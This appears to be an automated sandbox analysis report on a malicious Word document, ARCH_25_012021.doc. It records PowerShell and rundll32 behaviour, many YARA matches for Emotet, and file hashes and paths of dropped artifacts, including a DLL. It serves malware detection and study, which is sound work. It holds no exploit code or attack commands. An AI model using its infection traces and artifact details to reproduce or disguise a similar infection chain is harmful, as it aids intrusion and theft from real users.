Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Source: Yara match	File source: 0000000F.00000002.2108207451.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102924374.0000000000660000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102828167.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2094445834.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2095209420.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2097508616.0000000000300000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2101092569.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2108344528.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2338438182.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102745390.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2100869950.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2107877116.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2099763419.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2094474454.0000000000740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2098058880.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2101004097.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2098090844.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2108318970.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2338458694.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2095115818.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2095854537.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2107894176.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2099872528.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2098968815.0000000000140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2092243778.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.660000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.740000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.660000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.410000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.740000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.5a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE

ID:	344718
Product:	CloudBasic
Start time:	00:09:24
Start date:	27.01.2021
Sample:	ARCH_25_012021.doc
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	baedc37e68b58765fa52c73d0fd2c2d5
SHA1:	2131d1319b5de532638d34f1e3bf68337b6099bf
SHA256:	94485b3ce47d4a2df6dba8e888ca7a360763f7edd5a0448552d1d06b6e4f4baa
Filetype:	Microsoft Word document (32009/1) 79.99%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D51ADA38-B04E-4308-BA86-6463BC7125FE}.tmp	data	889FF7B467168A53D30DCF248A7DD694	03DAC36C5B9110C3EA375EF7B8E015BEB3C1DF0D	4A6F10669F37499EF0C305D42D22F271DE5D958D514E2607889A474FE3D9E8AF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5248432-B174-499E-B3BD-E7523F18DF93}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ARCH_25_012021.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Wed Jan 27 07:09:33 2021, length=175616, window=hide	B51BD5888A718D41D4CD2F7F2B8103D3	DEEACC8F0F8827D8B6DC5005EAFFA873C909CC11	4D9F202ABB4879D467C3609EBDAD6116A8FAFA230120DED70D35E1103B5C5714
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	EF242110122D8695A53B38974D63C306	F74EF8F7E90EF2B664F03FC482D2F1526159AC48	320FBB51CEDFAE2FA1371AAD0622E8A5333C66EBE13A89A21B19789A0739B236
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	39EB3053A717C25AF84D576F6B2EBDD2	F6157079187E865C1BAADCC2014EF58440D449CA	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HGZZKPEW76Z29NVBJ16Y.temp	data	495C21C9F44F74A23210A1F8B666074A	BADCFBEE9A435173F7564DF70C8C806ADD89EB0C	461F1E4BB3FED6EA8A0B1BC71BD4A520C16BACC99ED580A39ADB55D8EB321C42
C:\Users\user\Desktop\~$CH_25_012021.doc	data	39EB3053A717C25AF84D576F6B2EBDD2	F6157079187E865C1BAADCC2014EF58440D449CA	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
C:\Users\user\Kaktksw\An6othh\N49I.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	E09F65C1A92653035B27E603980CB205	78DCA7A2190C82DC8DC4A0EAC302379804C79AA9	D09BACE1490F6EE322262FF2DA373E861F3B3B9BC03C386CE8A031648F1EAA4F

Analysis Report ARCH_25_012021.doc

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs